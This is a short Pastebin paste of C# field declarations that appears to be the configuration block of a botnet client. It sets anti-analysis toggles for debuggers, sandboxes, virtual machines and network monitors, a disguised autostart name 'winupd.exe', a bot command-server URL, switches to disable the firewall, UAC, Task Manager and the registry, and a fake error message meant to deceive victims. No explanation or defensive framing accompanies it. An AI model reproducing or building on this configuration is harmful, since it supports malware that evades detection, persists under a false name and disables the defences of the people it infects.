Advertisement
Guest User

Untitled

a guest
Jun 25th, 2017
49
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.70 KB | None | 0 0
  1. private static bool AntiCainandAbel = false;
  2. private static bool AntiDebugger = false;
  3. private static bool AntiEmulator = false;
  4. private static bool AntiFilemon = false;
  5. private static bool AntiNetstat = false;
  6. private static bool AntiNetworkmon = false;
  7. private static bool AntiParallelsDesktop = false;
  8. private static bool AntiProcessmon = false;
  9. private static bool AntiRegmon = false;
  10. private static bool AntiSandboxie = false;
  11. private static bool AntiTCPView = false;
  12. private static bool AntiVirtualBox = false;
  13. private static bool AntiVirtualPC = false;
  14. private static bool AntiVMWare = false;
  15. private static bool AntiWireshark = false;
  16. private static string AutostartName = "winupd.exe";
  17. private static string BotServer = "example.com/login/connect.php";
  18. private static string BotVersion = "1.5";
  19. private static string ConnectionInterval = "1";
  20. private static string Country = CultureInfo.CurrentUICulture.Name.Substring(3);
  21. private static bool DelayStart = false;
  22. private static string DelayTime = "Delay";
  23. private static bool DisableCMD = false;
  24. private static bool DisableFirewall = false;
  25. private static bool DisableRegistry = false;
  26. private static bool DisableTaskmanager = false;
  27. private static bool DisableUAC = false;
  28. private static bool FakeError = false;
  29. private static string FakeErrorMessage = "An unexpected error has encountered. This may indicate a problem with this package. The error code is 2753.";
  30. private static string FakeErrorTitle = "Error!";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement